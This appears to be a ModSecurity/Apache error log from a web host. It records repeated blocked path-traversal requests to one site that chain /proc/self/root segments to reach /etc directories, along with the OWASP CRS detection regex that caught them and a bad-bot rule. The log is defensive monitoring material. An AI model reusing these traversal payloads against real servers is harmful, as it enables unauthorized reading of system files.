[Mon Mar 16 16:29:54.685776 2026] [:error] [pid 14895:tid 140411674785536] [client 74.7.241.46:60638] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaMlajLEzk2WiQ-10kagAAAog"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:30:03.546089 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:60646] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaO7ysWC90G-1nBrBVyQAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:30:05.133100 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:50094] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaPf9ocpUE4ed4uDwENwAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:30:10.471482 2026] [:error] [pid 10651:tid 140411548894976] [client 74.7.241.46:58674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaQrysWC90G-1nBrBVzwAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:30:23.369450 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.241.46:50440] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaT1ajLEzk2WiQ-10kdwAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:31:20.858742 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.243.203:50372] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaiM_BxrYCr4hPDw_80gAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:21.035104 2026] [:error] [pid 29507:tid 140411649607424] [client 74.7.228.16:52960] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhaiUr9dMAiw-8KANNYiwAAAQs"]
[Mon Mar 16 16:31:23.349838 2026] [mime_magic:error] [pid 14895:tid 140411683178240] (70014)End of file found: [client 74.7.243.203:38744] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/run
[Mon Mar 16 16:31:24.241830 2026] [:error] [pid 29802:tid 140411649607424] [client 74.7.243.203:38748] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhajM_BxrYCr4hPDw_80wAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:27.001604 2026] [:error] [pid 29802:tid 140411616036608] [client 74.7.243.203:38762] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaj8_BxrYCr4hPDw_81wAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:29.864209 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.243.203:38772] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhakaTCbgAP5jq5Teg-DgAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:31.597776 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.243.203:37906] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhak9SswJuvopo3lOhxEQAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:32.729384 2026] [:error] [pid 15061:tid 140411691570944] [client 74.7.243.203:37914] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhalKTCbgAP5jq5Teg-EgAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:35.264800 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:37916] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhal7ABkC4fWIHEf8EFYgAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:37.849337 2026] [:error] [pid 15568:tid 140411683178240] [client 74.7.243.203:37930] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhamaQpVkWug9HeOt9H_QAAA0c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:39.259276 2026] [:error] [pid 15568:tid 140411557287680] [client 74.7.243.203:37942] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abham6QpVkWug9HeOt9H_gAAA1Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:40.623950 2026] [:error] [pid 10772:tid 140411641214720] [client 74.7.243.203:57948] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhanP9ocpUE4ed4uDwEUgAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:45.047697 2026] [:error] [pid 10651:tid 140411699963648] [client 74.7.243.203:57958] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaobysWC90G-1nBrBV4QAAAYU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:47.431110 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.243.203:57974] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhao6QpVkWug9HeOt9IBAAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:50.184522 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:57986] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhapdSswJuvopo3lOhxFgAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:52.648501 2026] [:error] [pid 10651:tid 140411666392832] [client 74.7.243.203:34824] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaqLysWC90G-1nBrBV4wAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:55.015099 2026] [:error] [pid 29507:tid 140411683178240] [client 74.7.243.203:34838] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhaq0r9dMAiw-8KANNYlQAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:31:56.371825 2026] [:error] [pid 29507:tid 140411641214720] [client 74.7.243.203:34840] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abharEr9dMAiw-8KANNYlwAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
